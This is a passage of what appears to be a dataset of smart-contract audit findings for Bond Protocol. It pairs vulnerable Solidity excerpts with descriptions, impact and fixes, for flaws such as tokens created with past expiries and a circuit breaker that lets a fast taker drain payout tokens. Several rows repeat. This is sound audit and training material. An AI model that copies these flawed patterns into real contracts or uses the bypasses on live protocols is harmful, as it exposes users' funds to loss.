expiry:\\n```\\ntokenMetadata[tokenId_] = TokenMetadata(\\n true,\\n underlying_,\\n uint8(underlying_.decimals()),\\n expiry_,\\n 0\\n);\\n```\\n","Include the same rounding process in `deploy()` as is included in _handlePayout():\\n```\\nfunction deploy(ERC20 underlying_, uint48 expiry_)\\n external\\n override\\n nonReentrant\\n returns (uint256)\\n {\\n expiry = ((vesting_ + uint48(block.timestamp)) / uint48(1 days)) * uint48(1 days);\\n uint256 tokenId = getTokenId(underlying_, expiry_);\\n // rest of code\\n```\\n","The `deploy()` function causes a number of issues:\\nTokens can be deployed that don't expire at the expected daily time, which may cause issues with your front end or break user's expectations\\nTokens can expire at times that don't align with the time included in the tokenId\\nMalicious users can pre-deploy tokens at future timestamps to ""take over"" the token for a given day and lock it at a later time stamp, which then ""locks in"" that expiry time and can't be changed by the protocol","```\\n// rest of code\\nexpiry = ((vesting_ + uint48(block.timestamp)) / uint48(1 days)) * uint48(1 days);\\n\\n// Fixed-term user payout information is handled in BondTeller.\\n// Teller mints ERC-1155 bond tokens for user.\\nuint256 tokenId = getTokenId(payoutToken_, expiry);\\n\\n// Create new bond token if it doesn't exist yet\\nif (!tokenMetadata[tokenId].active) {\\n _deploy(tokenId, payoutToken_, expiry);\\n}\\n// rest of code\\n```\\n" +Fixed Term Teller tokens can be created with an expiry in the past,high,"The Fixed Term Teller does not allow tokens to be created with a timestamp in the past. This is a fact that protocols using this feature will expect to hold and build their systems around. However, users can submit expiry timestamps slightly in the future, which correlate to tokenIds in the past, which allows them to bypass this check.\\nIn `BondFixedTermTeller.sol`, the `create()` function allows protocols to trade their payout tokens directly for bond tokens. The expectation is that protocols will build their own mechanisms around this. It is explicitly required that they cannot do this for bond tokens that expire in the past, only those that have yet to expire:\\n```\\nif (expiry_ < block.timestamp) revert Teller_InvalidParams();\\n```\\n\\nHowever, because tokenIds round timestamps down to the latest day, protocols are able to get around this check.\\nHere's an example:\\nThe most recently expired token has an expiration time of 1668524400 (correlates to 9am this morning)\\nIt is currently 1668546000 (3pm this afternoon)\\nA protocol calls create() with an expiry of 1668546000 + 1\\nThis passes the check that `expiry_ >= block.timestamp`\\nWhen the expiry is passed to `getTokenId()` it rounds the time down to the latest day, which is the day corresponding with 9am this morning\\nThis expiry associated with this tokenId is 9am this morning, so they are able to redeem their tokens instantly","Before checking whether `expiry_ < block.timestamp`, expiry should be rounded to the nearest day:\\n```\\nexpiry = ((vesting_ + uint48(block.timestamp)) / uint48(1 days)) * uint48(1 days);\\n```\\n","Protocols can bypass the check that all created tokens must have an expiry in the future, and mint tokens with a past expiry that can be redeemed immediately.\\nThis may not cause a major problem for Bond Protocol itself, but protocols will be building on top of this feature without expecting this behavior.\\nLet's consider, for example, a protocol that builds a mechanism where users can stake some asset, and the protocol will trade payout tokens to create bond tokens for them at a discount, with the assumption that they will expire in the future. This issue could create an opening for a savvy user to stake, mint bond tokens, redeem and dump them immediately, buy more assets to stake, and continue this cycle to earn arbitrage returns and tank the protocol's token.\\nBecause there are a number of situations like the one above where this issue could lead to a major loss of funds for a protocol building on top of Bond, I consider this a high severity.",```\\nif (expiry_ < block.timestamp) revert Teller_InvalidParams();\\n```\\n +findMarketFor() missing check minAmountOut_,medium,"BondAggregator#findMarketFor() minAmountOut_ does not actually take effect,may return a market's ""payout"" smaller than minAmountOut_ , Causes users to waste gas calls to purchase\\nBondAggregator#findMarketFor() has check minAmountOut_ <= maxPayout but the actual ""payout"" by ""amountIn_"" no check greater than minAmountOut_\\n```\\n function findMarketFor(\\n address payout_,\\n address quote_,\\n uint256 amountIn_,\\n uint256 minAmountOut_,\\n uint256 maxExpiry_\\n ) external view returns (uint256) {\\n// rest of code\\n if (expiry <= maxExpiry_) {\\n payouts[i] = minAmountOut_ <= maxPayout\\n ? payoutFor(amountIn_, ids[i], address(0))\\n : 0;\\n\\n if (payouts[i] > highestOut) {//****@audit not check payouts[i] >= minAmountOut_******//\\n highestOut = payouts[i];\\n id = ids[i];\\n }\\n }\\n```\\n","```\\n function findMarketFor(\\n address payout_,\\n address quote_,\\n uint256 amountIn_,\\n uint256 minAmountOut_,\\n uint256 maxExpiry_\\n ) external view returns (uint256) {\\n// rest of code\\n if (expiry <= maxExpiry_) {\\n payouts[i] = minAmountOut_ <= maxPayout\\n ? payoutFor(amountIn_, ids[i], address(0))\\n : 0;\\n\\n- if (payouts[i] > highestOut) {\\n+ if (payouts[i] >= minAmountOut_ && payouts[i] > highestOut) {\\n highestOut = payouts[i];\\n id = ids[i];\\n }\\n }\\n```\\n","The user gets the optimal market through BondAggregator#findMarketFor(), but incorrectly returns a market smaller than minAmountOut_, and the call to purchase must fail, resulting in wasted gas","```\\n function findMarketFor(\\n address payout_,\\n address quote_,\\n uint256 amountIn_,\\n uint256 minAmountOut_,\\n uint256 maxExpiry_\\n ) external view returns (uint256) {\\n// rest of code\\n if (expiry <= maxExpiry_) {\\n payouts[i] = minAmountOut_ <= maxPayout\\n ? payoutFor(amountIn_, ids[i], address(0))\\n : 0;\\n\\n if (payouts[i] > highestOut) {//****@audit not check payouts[i] >= minAmountOut_******//\\n highestOut = payouts[i];\\n id = ids[i];\\n }\\n }\\n```\\n" +Existing Circuit Breaker Implementation Allow Faster Taker To Extract Payout Tokens From Market,medium,"The current implementation of the circuit breaker is not optimal. Thus, the market maker will lose an excessive amount of payout tokens if a quoted token suddenly loses a large amount of value, even with a circuit breaker in place.\\nWhen the amount of the payout tokens purchased by the taker exceeds the `term.maxDebt`, the taker is still allowed to carry on with the transaction, and the market will only be closed after the current transaction is completed.\\n```\\nFile: BondBaseSDA.sol\\n // Circuit breaker. If max debt is breached, the market is closed\\n if (term.maxDebt < market.totalDebt) {\\n _close(id_);\\n } else {\\n // If market will continue, the control variable is tuned to to expend remaining capacity over remaining market duration\\n _tune(id_, currentTime, price);\\n }\\n```\\n\\nAssume that the state of the SDAM at T0 is as follows:\\n`term.maxDebt` is 110 (debt buffer = 10%)\\n`maxPayout` is 100\\n`market.totalDebt` is 99\\nAssume that the quoted token suddenly loses a large amount of value (e.g. stablecoin depeg causing the quote token to drop to almost zero). Bob decided to purchase as many payout tokens as possible before reaching the `maxPayout` limit to maximize the value he could extract from the market. Assume that Bob is able to purchase 50 bond tokens at T1 before reaching the `maxPayout` limit. As such, the state of the SDAM at T1 will be as follows:\\n`term.maxDebt` = 110\\n`maxPayout` = 100\\n`market.totalDebt` = 99 + 50 = 149\\nIn the above scenario, Bob's purchase has already breached the `term.maxDebt` limit. However, he could still purchase the 50 bond tokens in the current transaction.","Considering only allowing takers to purchase bond tokens up to the `term.maxDebt` limit.\\nFor instance, based on the earlier scenario, only allow Bob to purchase up to 11 bond tokens (term.maxDebt[110] - market.totalDebt[99]) instead of allowing him to purchase 50 bond tokens.\\nIf Bob attempts to purchase 50 bond tokens, the market can proceed to purchase the 11 bond tokens for Bob, and the remaining quote tokens can be refunded back to Bob. After that, since the `term.maxDebt (110) == market.totalDebt (110)`, the market can trigger the circuit breaker to close the market to protect the market from potential extreme market conditions.\\nThis ensures that bond tokens beyond the `term.maxDebt` limit would not be sold to the taker during extreme market conditions.","In the event that the price of the quote token falls to almost zero (e.g. 0.0001 dollars), then the fastest taker will be able to extract as many payout tokens as possible before reaching the `maxPayout` limit from the market. The extracted payout tokens are essentially free for the fastest taker. Taker gain is maker loss.\\nAdditionally, in the event that a quoted token suddenly loses a large amount of value, the amount of payout tokens lost by the market marker is capped at the `maxPayout` limit instead of capping the loss at the `term.maxDebt` limit. This resulted in the market makers losing more payout tokens than expected, and their payout tokens being sold to the takers at a very low price (e.g. 0.0001 dollars).\\nThe market makers will suffer more loss if the `maxPayout` limit of their markets is higher.","```\\nFile: BondBaseSDA.sol\\n // Circuit breaker. If max debt is breached, the market is closed\\n if (term.maxDebt < market.totalDebt) {\\n _close(id_);\\n } else {\\n // If market will continue, the control variable is tuned to to expend remaining capacity over remaining market duration\\n _tune(id_, currentTime, price);\\n }\\n```\\n" +Create Fee Discount Feature Is Broken,medium,"The create fee discount feature is found to be broken within the protocol.\\nThe create fee discount feature relies on the `createFeeDiscount` state variable to determine the fee to be discounted from the protocol fee. However, it was observed that there is no way to initialize the `createFeeDiscount` state variable. As a result, the `createFeeDiscount` state variable will always be zero.\\n```\\nFile: BondFixedExpiryTeller.sol\\n // If fee is greater than the create discount, then calculate the fee and store it\\n // Otherwise, fee is zero.\\n if (protocolFee > createFeeDiscount) {\\n // Calculate fee amount\\n uint256 feeAmount = amount_.mulDiv(protocolFee - createFeeDiscount, FEE_DECIMALS);\\n rewards[_protocol][underlying_] += feeAmount;\\n\\n // Mint new bond tokens\\n bondToken.mint(msg.sender, amount_ - feeAmount);\\n\\n return (bondToken, amount_ - feeAmount);\\n } else {\\n // Mint new bond tokens\\n bondToken.mint(msg.sender, amount_);\\n\\n return (bondToken, amount_);\\n }\\n```\\n\\n```\\nFile: BondFixedTermTeller.sol\\n // If fee is greater than the create discount, then calculate the fee and store it\\n // Otherwise, fee is zero.\\n if (protocolFee > createFeeDiscount) {\\n // Calculate fee amount\\n uint256 feeAmount = amount_.mulDiv(protocolFee - createFeeDiscount, FEE_DECIMALS);\\n rewards[_protocol][underlying_] += feeAmount;\\n\\n // Mint new bond tokens\\n _mintToken(msg.sender, tokenId, amount_ - feeAmount);\\n\\n return (tokenId, amount_ - feeAmount);\\n } else {\\n // Mint new bond tokens\\n _mintToken(msg.sender, tokenId, amount_);\\n\\n return (tokenId, amount_);\\n }\\n```\\n",Implement a setter method for the `createFeeDiscount` state variable and the necessary verification checks.\\n```\\nfunction setCreateFeeDiscount(uint48 createFeeDiscount_) external requiresAuth {\\n if (createFeeDiscount_ > protocolFee) revert Teller_InvalidParams();\\n if (createFeeDiscount_ > 5e3) revert Teller_InvalidParams();\\n createFeeDiscount = createFeeDiscount_;\\n}\\n```\\n,"The create fee discount feature is broken within the protocol. There is no way for the protocol team to configure a discount for the users of the `BondFixedExpiryTeller.create` and `BondFixedTermTeller.create` functions. As such, the users will not obtain any discount from the protocol when using the create function.","```\\nFile: BondFixedExpiryTeller.sol\\n // If fee is greater than the create discount, then calculate the fee and store it\\n // Otherwise, fee is zero.\\n if (protocolFee > createFeeDiscount) {\\n // Calculate fee amount\\n uint256 feeAmount = amount_.mulDiv(protocolFee - createFeeDiscount, FEE_DECIMALS);\\n rewards[_protocol][underlying_] += feeAmount;\\n\\n // Mint new bond tokens\\n bondToken.mint(msg.sender, amount_ - feeAmount);\\n\\n return (bondToken, amount_ - feeAmount);\\n } else {\\n // Mint new bond tokens\\n bondToken.mint(msg.sender, amount_);\\n\\n return (bondToken, amount_);\\n }\\n```\\n" +Auctioneer Cannot Be Removed From The Protocol,medium,"If a vulnerable Auctioneer is being exploited by an attacker, there is no way to remove the vulnerable Auctioneer from the protocol.\\nThe protocol is missing the feature to remove an auctioneer. Once an auctioneer has been added to the whitelist, it is not possible to remove the auctioneer from the whitelist.\\n```\\nFile: BondAggregator.sol\\n function registerAuctioneer(IBondAuctioneer auctioneer_) external requiresAuth {\\n // Restricted to authorized addresses\\n\\n // Check that the auctioneer is not already registered\\n if (_whitelist[address(auctioneer_)])\\n revert Aggregator_AlreadyRegistered(address(auctioneer_));\\n\\n // Add the auctioneer to the whitelist\\n auctioneers.push(auctioneer_);\\n _whitelist[address(auctioneer_)] = true;\\n }\\n```\\n","Consider implementing an additional function to allow the removal of an Auctioneer from the whitelist, so that vulnerable Auctioneer can be removed swiftly if needed.\\n```\\nfunction deregisterAuctioneer(IBondAuctioneer auctioneer_) external requiresAuth {\\n // Remove the auctioneer from the whitelist\\n _whitelist[address(auctioneer_)] = false;\\n}\\n```\\n","In the event that a whitelisted Auctioneer is found to be vulnerable and has been actively exploited by an attacker in the wild, the protocol needs to mitigate the issue swiftly by removing the vulnerable Auctioneer from the protocol. However, the mitigation effort will be hindered by the fact there is no way to remove an Auctioneer within the protocol once it has been whitelisted. Thus, it might not be possible to stop the attacker from exploiting the vulnerable Auctioneer. The protocol team would need to find a workaround to block the attack, which will introduce an unnecessary delay to the recovery process where every second counts.\\nAdditionally, if the admin accidentally whitelisted the wrong Auctioneer, there is no way to remove it.",```\\nFile: BondAggregator.sol\\n function registerAuctioneer(IBondAuctioneer auctioneer_) external requiresAuth {\\n // Restricted to authorized addresses\\n\\n // Check that the auctioneer is not already registered\\n if (_whitelist[address(auctioneer_)])\\n revert Aggregator_AlreadyRegistered(address(auctioneer_));\\n\\n // Add the auctioneer to the whitelist\\n auctioneers.push(auctioneer_);\\n _whitelist[address(auctioneer_)] = true;\\n }\\n```\\n +BondBaseSDA.setDefaults doesn't validate inputs,medium,"BondBaseSDA.setDefaults doesn't validate inputs which can lead to initializing new markets incorrectly\\n```\\n function setDefaults(uint32[6] memory defaults_) external override requiresAuth {\\n // Restricted to authorized addresses\\n defaultTuneInterval = defaults_[0];\\n defaultTuneAdjustment = defaults_[1];\\n minDebtDecayInterval = defaults_[2];\\n minDepositInterval = defaults_[3];\\n minMarketDuration = defaults_[4];\\n minDebtBuffer = defaults_[5];\\n }\\n```\\n\\nFunction BondBaseSDA.setDefaults doesn't do any checkings, as you can see. Because of that it's possible to provide values that will break market functionality.\\nFor example you can set `minDepositInterval` to be bigger than `minMarketDuration` and it will be not possible to create new market.\\nOr you can provide `minDebtBuffer` to be 100% ot 0% that will break logic of market closing.",Add input validation.,Can't create new market or market logic will be not working as designed.,```\\n function setDefaults(uint32[6] memory defaults_) external override requiresAuth {\\n // Restricted to authorized addresses\\n defaultTuneInterval = defaults_[0];\\n defaultTuneAdjustment = defaults_[1];\\n minDebtDecayInterval = defaults_[2];\\n minDepositInterval = defaults_[3];\\n minMarketDuration = defaults_[4];\\n minDebtBuffer = defaults_[5];\\n }\\n```\\n +BondAggregator.liveMarketsBy eventually will revert because of block gas limit,medium,"BondAggregator.liveMarketsBy eventually will revert because of block gas limit\\n```\\n function liveMarketsBy(address owner_) external view returns (uint256[] memory) {\\n uint256 count;\\n IBondAuctioneer auctioneer;\\n for (uint256 i; i < marketCounter; ++i) {\\n auctioneer = marketsToAuctioneers[i];\\n if (auctioneer.isLive(i) && auctioneer.ownerOf(i) == owner_) {\\n ++count;\\n }\\n }\\n\\n\\n uint256[] memory ids = new uint256[](count);\\n count = 0;\\n for (uint256 i; i < marketCounter; ++i) {\\n auctioneer = marketsToAuctioneers[i];\\n if (auctioneer.isLive(i) && auctioneer.ownerOf(i) == owner_) {\\n ids[count] = i;\\n ++count;\\n }\\n }\\n\\n\\n return ids;\\n }\\n```\\n\\nBondAggregator.liveMarketsBy function is looping through all markets and does at least `marketCounter` amount of external calls(when all markets are not live) and at most 4 * `marketCounter` external calls(when all markets are live and owner matches. This all consumes a lot of gas, even that is called from view function. And each new market increases loop size.\\nThat means that after some time `marketsToAuctioneers` mapping will be big enough that the gas amount sent for view/pure function will be not enough to retrieve all data(50 million gas according to this). So the function will revert.\\nAlso similar problem is with `findMarketFor`, `marketsFor` and `liveMarketsFor` functions.",Remove not active markets or some start and end indices to functions.,Functions will always revert and whoever depends on it will not be able to get information.,```\\n function liveMarketsBy(address owner_) external view returns (uint256[] memory) {\\n uint256 count;\\n IBondAuctioneer auctioneer;\\n for (uint256 i; i < marketCounter; ++i) {\\n auctioneer = marketsToAuctioneers[i];\\n if (auctioneer.isLive(i) && auctioneer.ownerOf(i) == owner_) {\\n ++count;\\n }\\n }\\n\\n\\n uint256[] memory ids = new uint256[](count);\\n count = 0;\\n for (uint256 i; i < marketCounter; ++i) {\\n auctioneer = marketsToAuctioneers[i];\\n if (auctioneer.isLive(i) && auctioneer.ownerOf(i) == owner_) {\\n ids[count] = i;\\n ++count;\\n }\\n }\\n\\n\\n return ids;\\n }\\n```\\n +meta.tuneBelowCapacity param is not updated when BondBaseSDA.setIntervals is called,medium,"When BondBaseSDA.setIntervals function is called then meta.tuneBelowCapacity param is not updated which has impact on price tuning.\\n```\\n function setIntervals(uint256 id_, uint32[3] calldata intervals_) external override {\\n // Check that the market is live\\n if (!isLive(id_)) revert Auctioneer_InvalidParams();\\n\\n\\n // Check that the intervals are non-zero\\n if (intervals_[0] == 0 || intervals_[1] == 0 || intervals_[2] == 0)\\n revert Auctioneer_InvalidParams();\\n\\n\\n // Check that tuneInterval >= tuneAdjustmentDelay\\n if (intervals_[0] < intervals_[1]) revert Auctioneer_InvalidParams();\\n\\n\\n BondMetadata storage meta = metadata[id_];\\n // Check that tuneInterval >= depositInterval\\n if (intervals_[0] < meta.depositInterval) revert Auctioneer_InvalidParams();\\n\\n\\n // Check that debtDecayInterval >= minDebtDecayInterval\\n if (intervals_[2] < minDebtDecayInterval) revert Auctioneer_InvalidParams();\\n\\n\\n // Check that sender is market owner\\n BondMarket memory market = markets[id_];\\n if (msg.sender != market.owner) revert Auctioneer_OnlyMarketOwner();\\n\\n\\n // Update intervals\\n meta.tuneInterval = intervals_[0];\\n meta.tuneIntervalCapacity = market.capacity.mulDiv(\\n uint256(intervals_[0]),\\n uint256(terms[id_].conclusion) - block.timestamp\\n ); // don't have a stored value for market duration, this will update tuneIntervalCapacity based on time remaining\\n meta.tuneAdjustmentDelay = intervals_[1];\\n meta.debtDecayInterval = intervals_[2];\\n }\\n```\\n\\n`meta.tuneInterval` has impact on `meta.tuneIntervalCapacity`. That means that when you change tuning interval you also change the capacity that is operated during tuning. There is also one more param that depends on this, but is not counted here.\\n```\\n if (\\n (market.capacity < meta.tuneBelowCapacity && timeNeutralCapacity < initialCapacity) ||\\n (time_ >= meta.lastTune + meta.tuneInterval && timeNeutralCapacity > initialCapacity)\\n ) {\\n // Calculate the correct payout to complete on time assuming each bond\\n // will be max size in the desired deposit interval for the remaining time\\n //\\n // i.e. market has 10 days remaining. deposit interval is 1 day. capacity\\n // is 10,000 TOKEN. max payout would be 1,000 TOKEN (10,000 * 1 / 10).\\n markets[id_].maxPayout = capacity.mulDiv(uint256(meta.depositInterval), timeRemaining);\\n\\n\\n // Calculate ideal target debt to satisty capacity in the remaining time\\n // The target debt is based on whether the market is under or oversold at this point in time\\n // This target debt will ensure price is reactive while ensuring the magnitude of being over/undersold\\n // doesn't cause larger fluctuations towards the end of the market.\\n //\\n // Calculate target debt from the timeNeutralCapacity and the ratio of debt decay interval and the length of the market\\n uint256 targetDebt = timeNeutralCapacity.mulDiv(\\n uint256(meta.debtDecayInterval),\\n uint256(meta.length)\\n );\\n\\n\\n // Derive a new control variable from the target debt\\n uint256 controlVariable = terms[id_].controlVariable;\\n uint256 newControlVariable = price_.mulDivUp(market.scale, targetDebt);\\n\\n\\n emit Tuned(id_, controlVariable, newControlVariable);\\n\\n\\n if (newControlVariable < controlVariable) {\\n // If decrease, control variable change will be carried out over the tune interval\\n // this is because price will be lowered\\n uint256 change = controlVariable - newControlVariable;\\n adjustments[id_] = Adjustment(change, time_, meta.tuneAdjustmentDelay, true);\\n } else {\\n // Tune up immediately\\n terms[id_].controlVariable = newControlVariable;\\n // Set current adjustment to inactive (e.g. if we are re-tuning early)\\n adjustments[id_].active = false;\\n }\\n\\n\\n metadata[id_].lastTune = time_;\\n metadata[id_].tuneBelowCapacity = market.capacity > meta.tuneIntervalCapacity\\n ? market.capacity - meta.tuneIntervalCapacity\\n : 0;\\n metadata[id_].lastTuneDebt = targetDebt;\\n }\\n```\\n\\nIf you don't update `meta.tuneBelowCapacity` when changing intervals you have a risk, that price will not be tuned when tuneIntervalCapacity was decreased or it will be still tuned when tuneIntervalCapacity was increased.\\nAs a result tuning will not be completed when needed.",Update meta.tuneBelowCapacity in BondBaseSDA.setIntervals function.,Tuning logic will not be completed when needed.,"```\\n function setIntervals(uint256 id_, uint32[3] calldata intervals_) external override {\\n // Check that the market is live\\n if (!isLive(id_)) revert Auctioneer_InvalidParams();\\n\\n\\n // Check that the intervals are non-zero\\n if (intervals_[0] == 0 || intervals_[1] == 0 || intervals_[2] == 0)\\n revert Auctioneer_InvalidParams();\\n\\n\\n // Check that tuneInterval >= tuneAdjustmentDelay\\n if (intervals_[0] < intervals_[1]) revert Auctioneer_InvalidParams();\\n\\n\\n BondMetadata storage meta = metadata[id_];\\n // Check that tuneInterval >= depositInterval\\n if (intervals_[0] < meta.depositInterval) revert Auctioneer_InvalidParams();\\n\\n\\n // Check that debtDecayInterval >= minDebtDecayInterval\\n if (intervals_[2] < minDebtDecayInterval) revert Auctioneer_InvalidParams();\\n\\n\\n // Check that sender is market owner\\n BondMarket memory market = markets[id_];\\n if (msg.sender != market.owner) revert Auctioneer_OnlyMarketOwner();\\n\\n\\n // Update intervals\\n meta.tuneInterval = intervals_[0];\\n meta.tuneIntervalCapacity = market.capacity.mulDiv(\\n uint256(intervals_[0]),\\n uint256(terms[id_].conclusion) - block.timestamp\\n ); // don't have a stored value for market duration, this will update tuneIntervalCapacity based on time remaining\\n meta.tuneAdjustmentDelay = intervals_[1];\\n meta.debtDecayInterval = intervals_[2];\\n }\\n```\\n" +Existing Circuit Breaker Implementation Allow Faster Taker To Extract Payout Tokens From Market,medium,"The current implementation of the circuit breaker is not optimal. Thus, the market maker will lose an excessive amount of payout tokens if a quoted token suddenly loses a large amount of value, even with a circuit breaker in place.\\nWhen the amount of the payout tokens purchased by the taker exceeds the `term.maxDebt`, the taker is still allowed to carry on with the transaction, and the market will only be closed after the current transaction is completed.\\n```\\nFile: BondBaseSDA.sol\\n // Circuit breaker. If max debt is breached, the market is closed\\n if (term.maxDebt < market.totalDebt) {\\n _close(id_);\\n } else {\\n // If market will continue, the control variable is tuned to to expend remaining capacity over remaining market duration\\n _tune(id_, currentTime, price);\\n }\\n```\\n\\nAssume that the state of the SDAM at T0 is as follows:\\n`term.maxDebt` is 110 (debt buffer = 10%)\\n`maxPayout` is 100\\n`market.totalDebt` is 99\\nAssume that the quoted token suddenly loses a large amount of value (e.g. stablecoin depeg causing the quote token to drop to almost zero). Bob decided to purchase as many payout tokens as possible before reaching the `maxPayout` limit to maximize the value he could extract from the market. Assume that Bob is able to purchase 50 bond tokens at T1 before reaching the `maxPayout` limit. As such, the state of the SDAM at T1 will be as follows:\\n`term.maxDebt` = 110\\n`maxPayout` = 100\\n`market.totalDebt` = 99 + 50 = 149\\nIn the above scenario, Bob's purchase has already breached the `term.maxDebt` limit. However, he could still purchase the 50 bond tokens in the current transaction.","Considering only allowing takers to purchase bond tokens up to the `term.maxDebt` limit.\\nFor instance, based on the earlier scenario, only allow Bob to purchase up to 11 bond tokens (term.maxDebt[110] - market.totalDebt[99]) instead of allowing him to purchase 50 bond tokens.\\nIf Bob attempts to purchase 50 bond tokens, the market can proceed to purchase the 11 bond tokens for Bob, and the remaining quote tokens can be refunded back to Bob. After that, since the `term.maxDebt (110) == market.totalDebt (110)`, the market can trigger the circuit breaker to close the market to protect the market from potential extreme market conditions.\\nThis ensures that bond tokens beyond the `term.maxDebt` limit would not be sold to the taker during extreme market conditions.","In the event that the price of the quote token falls to almost zero (e.g. 0.0001 dollars), then the fastest taker will be able to extract as many payout tokens as possible before reaching the `maxPayout` limit from the market. The extracted payout tokens are essentially free for the fastest taker. Taker gain is maker loss.\\nAdditionally, in the event that a quoted token suddenly loses a large amount of value, the amount of payout tokens lost by the market marker is capped at the `maxPayout` limit instead of capping the loss at the `term.maxDebt` limit. This resulted in the market makers losing more payout tokens than expected, and their payout tokens being sold to the takers at a very low price (e.g. 0.0001 dollars).\\nThe market makers will suffer more loss if the `maxPayout` limit of their markets is higher.","```\\nFile: BondBaseSDA.sol\\n // Circuit breaker. If max debt is breached, the market is closed\\n if (term.maxDebt < market.totalDebt) {\\n _close(id_);\\n } else {\\n // If market will continue, the control variable is tuned to to expend remaining capacity over remaining market duration\\n _tune(id_, currentTime, price);\\n }\\n```\\n" +Market Price Lower Than Expected,medium,"The market price does not conform to the specification documented within the whitepaper. As a result, the computed market price is lower than expected.\\nThe following definition of the market price is taken from the whitepaper. Taken from Page 13 of the whitepaper - Definition 25\\n\\nThe integer implementation of the market price must be rounded up per the whitepaper. This ensures that the integer implementation of the market price is greater than or equal to the real value of the market price so as to protect makers from selling tokens at a lower price than expected.\\nWithin the `BondBaseSDA.marketPrice` function, the computation of the market price is rounded up in Line 688, which conforms to the specification.\\n```\\nFile: BondBaseSDA.sol\\n function marketPrice(uint256 id_) public view override returns (uint256) {\\n uint256 price = currentControlVariable(id_).mulDivUp(currentDebt(id_), markets[id_].scale);\\n\\n return (price > markets[id_].minPrice) ? price : markets[id_].minPrice;\\n }\\n```\\n\\nHowever, within the `BondBaseSDA._currentMarketPrice` function, the market price is rounded down, resulting in the makers selling tokens at a lower price than expected.\\n```\\nFile: BondBaseSDA.sol\\n function _currentMarketPrice(uint256 id_) internal view returns (uint256) {\\n BondMarket memory market = markets[id_];\\n return terms[id_].controlVariable.mulDiv(market.totalDebt, market.scale);\\n }\\n```\\n","Ensure the market price is rounded up so that the desired property can be achieved and the makers will not be selling tokens at a lower price than expected.\\n```\\nfunction _currentMarketPrice(uint256 id_) internal view returns (uint256) {\\n BondMarket memory market = markets[id_];\\n// Remove the line below\\n return terms[id_].controlVariable.mulDiv(market.totalDebt, market.scale);\\n// Add the line below\\n return terms[id_].controlVariable.mulDivUp(market.totalDebt, market.scale);\\n}\\n```\\n","Loss for the makers as their tokens are sold at a lower price than expected.\\nAdditionally, the affected `BondBaseSDA._currentMarketPrice` function is used within the `BondBaseSDA._decayAndGetPrice` function to derive the market price. Since a lower market price will be returned, this will lead to a higher amount of payout tokens. Subsequently, the `lastDecayIncrement` will be higher than expected, which will lead to a lower `totalDebt`. Lower debt means a lower market price will be computed later.","```\\nFile: BondBaseSDA.sol\\n function marketPrice(uint256 id_) public view override returns (uint256) {\\n uint256 price = currentControlVariable(id_).mulDivUp(currentDebt(id_), markets[id_].scale);\\n\\n return (price > markets[id_].minPrice) ? price : markets[id_].minPrice;\\n }\\n```\\n" +Teller Cannot Be Removed From Callback Contract,medium,"If a vulnerable Teller is being exploited by an attacker, there is no way for the owner of the Callback Contract to remove the vulnerable Teller from their Callback Contract.\\nThe Callback Contract is missing the feature to remove a Teller. Once a Teller has been added to the whitelist (approvedMarkets mapping), it is not possible to remove the Teller from the whitelist.\\n```\\nFile: BondBaseCallback.sol\\n /* ========== WHITELISTING ========== */\\n\\n /// @inheritdoc IBondCallback\\n function whitelist(address teller_, uint256 id_) external override onlyOwner {\\n // Check that the market id is a valid, live market on the aggregator\\n try _aggregator.isLive(id_) returns (bool live) {\\n if (!live) revert Callback_MarketNotSupported(id_);\\n } catch {\\n revert Callback_MarketNotSupported(id_);\\n }\\n\\n // Check that the provided teller is the teller for the market ID on the stored aggregator\\n // We could pull the teller from the aggregator, but requiring the teller to be passed in\\n // is more explicit about which contract is being whitelisted\\n if (teller_ != address(_aggregator.getTeller(id_))) revert Callback_TellerMismatch();\\n\\n approvedMarkets[teller_][id_] = true;\\n }\\n```\\n","Consider implementing an additional function to allow the removal of a Teller from the whitelist (approvedMarkets mapping), so that a vulnerable Teller can be removed swiftly if needed.\\n```\\nfunction removeFromWhitelist(address teller_, uint256 id_) external override onlyOwner {\\n approvedMarkets[teller_][id_] = false;\\n}\\n```\\n\\nNote: Although the owner of the Callback Contract can DOS its own market by abusing the `removeFromWhitelist` function, no sensible owner would do so.","In the event that a whitelisted Teller is found to be vulnerable and has been actively exploited by an attacker in the wild, the owner of the Callback Contract needs to mitigate the issue swiftly by removing the vulnerable Teller from the Callback Contract to stop it from draining the asset within the Callback Contract. However, the mitigation effort will be hindered by the fact there is no way to remove a Teller within the Callback Contract once it has been whitelisted. Thus, it might not be possible to stop the attacker from exploiting the vulnerable Teller to drain assets within the Callback Contract. The Callback Contract owners would need to find a workaround to block the attack, which will introduce an unnecessary delay to the recovery process where every second counts.\\nAdditionally, if the owner accidentally whitelisted the wrong Teller, there is no way to remove it.","```\\nFile: BondBaseCallback.sol\\n /* ========== WHITELISTING ========== */\\n\\n /// @inheritdoc IBondCallback\\n function whitelist(address teller_, uint256 id_) external override onlyOwner {\\n // Check that the market id is a valid, live market on the aggregator\\n try _aggregator.isLive(id_) returns (bool live) {\\n if (!live) revert Callback_MarketNotSupported(id_);\\n } catch {\\n revert Callback_MarketNotSupported(id_);\\n }\\n\\n // Check that the provided teller is the teller for the market ID on the stored aggregator\\n // We could pull the teller from the aggregator, but requiring the teller to be passed in\\n // is more explicit about which contract is being whitelisted\\n if (teller_ != address(_aggregator.getTeller(id_))) revert Callback_TellerMismatch();\\n\\n approvedMarkets[teller_][id_] = true;\\n }\\n```\\n" +Create Fee Discount Feature Is Broken,medium,"The create fee discount feature is found to be broken within the protocol.\\nThe create fee discount feature relies on the `createFeeDiscount` state variable to determine the fee to be discounted from the protocol fee. However, it was observed that there is no way to initialize the `createFeeDiscount` state variable. As a result, the `createFeeDiscount` state variable will always be zero.\\n```\\nFile: BondFixedExpiryTeller.sol\\n // If fee is greater than the create discount, then calculate the fee and store it\\n // Otherwise, fee is zero.\\n if (protocolFee > createFeeDiscount) {\\n // Calculate fee amount\\n uint256 feeAmount = amount_.mulDiv(protocolFee - createFeeDiscount, FEE_DECIMALS);\\n rewards[_protocol][underlying_] += feeAmount;\\n\\n // Mint new bond tokens\\n bondToken.mint(msg.sender, amount_ - feeAmount);\\n\\n return (bondToken, amount_ - feeAmount);\\n } else {\\n // Mint new bond tokens\\n bondToken.mint(msg.sender, amount_);\\n\\n return (bondToken, amount_);\\n }\\n```\\n\\n```\\nFile: BondFixedTermTeller.sol\\n // If fee is greater than the create discount, then calculate the fee and store it\\n // Otherwise, fee is zero.\\n if (protocolFee > createFeeDiscount) {\\n // Calculate fee amount\\n uint256 feeAmount = amount_.mulDiv(protocolFee - createFeeDiscount, FEE_DECIMALS);\\n rewards[_protocol][underlying_] += feeAmount;\\n\\n // Mint new bond tokens\\n 